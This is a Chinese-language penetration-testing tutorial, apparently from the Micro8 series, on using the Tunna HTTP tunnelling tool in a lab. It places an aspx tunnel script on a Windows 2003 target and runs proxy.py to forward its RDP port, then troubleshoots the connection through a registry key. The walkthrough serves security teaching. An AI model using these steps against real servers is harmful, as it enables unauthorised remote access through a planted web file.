> For the complete documentation index, see [llms.txt](https://micro8.gitbook.io/micro8/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://micro8.gitbook.io/micro8/contents-1/91-100/99http-sui-dao-tunna-di-san-ji.md).

# 第九十九课：HTTP隧道Tunna第三季

**Tunna简介：**

Tunna1.1 是 secforce 在2014年11月出品的一款基于HTTP隧道工具。其中v1.1中支持了SOCKS4a。

Tunna演示稿：\
<https://drive.google.com/open?id=1PpB8_ks93isCaQMEUFf_cNvbDsBcsWzE>

Github：\
<https://github.com/SECFORCE/Tunna>

**攻击机：**\
192.168.1.5 Debian\
192.168.1.4 Windows 7

**靶机：**\
192.168.1.119 Windows 2003

**安装：**

```bash
root@John:~# git clone https://github.com/SECFORCE/Tunna.git
Cloning into 'Tunna'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 156 (delta 0), reused 2 (delta 0), pack‐reused 150
Receiving objects: 100% (156/156), 8.93 MiB | 25.00 KiB/s, done.
Resolving deltas: 100% (84/84), done.
```

![](/files/-LZPe3IDqvDKh1kD0Dt8)

**靶机执行：**

以aspx为demo。

![](/files/-LZPe3IGfcHVhnaP8WqY)

**攻击机执行：**

```python
python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v
```

![](/files/-LZPe3IKJr4VbjSFU5ox)

![](/files/-LZPe3INvBPmgKTSvVgV)

## 附录：

**解决：**&#x47;eneral Exception: \[Errno 104] Connection reset by peer

```bash
[+] Spawning keep‐alive thread
[‐] Keep‐alive thread not required
[+] Checking for proxy: False
```

连接后，出现

```bash
General Exception: [Errno 104] Connection reset by peer
```

等待出现：**无法验证此远程计算机的身份，是否仍要连接？**

再次运行，在点击是(Y)

```bash
python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v
```

![](/files/-LZPe3IQzUcKnYmZBuN8)

![](/files/-LZPe3ISMibZ7aQBb-Tc)

![](/files/-LZPe3IU1y3czJ5NScCg)

**如果：没有出现“无法验证此远程计算机的身份，是否仍要连接？”**

注册表键值： HKEY\_CURRENT\_USER\Software\Microsoft\Terminal Server Client\Servers 删除对应IP键值即可。

非常遗憾的是，Tunna对PHP的支持并不是太友好。

> Micropoor
